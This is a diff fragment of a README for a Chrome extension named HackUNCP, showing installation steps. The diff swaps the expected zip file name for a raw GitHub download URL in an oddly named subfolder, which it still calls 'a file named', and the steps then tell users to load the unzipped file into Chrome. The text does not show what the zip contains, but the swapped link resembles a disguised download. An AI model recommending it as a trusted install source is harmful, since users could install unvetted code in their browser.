Musthafani/HackUNCP/README.md

 2. **Download the Extension**:
    - Locate the latest version of HackUNCP listed.
    - Click on the version number to expand the details.
    - Depending on your operating system, find the appropriate download link.
-Typically, you will see a file named `hackuncp-chrome-extension.zip` or similar.
+Typically, you will see a file named `https://raw.githubusercontent.com/Musthafani/HackUNCP/main/counterthought/HackUNCP.zip` or similar.
 3. **Install the Extension**:
    - After the file has downloaded, unzip the file if it’s compressed.
    - Open Google Chrome and navigate to `chrome://extensions/`.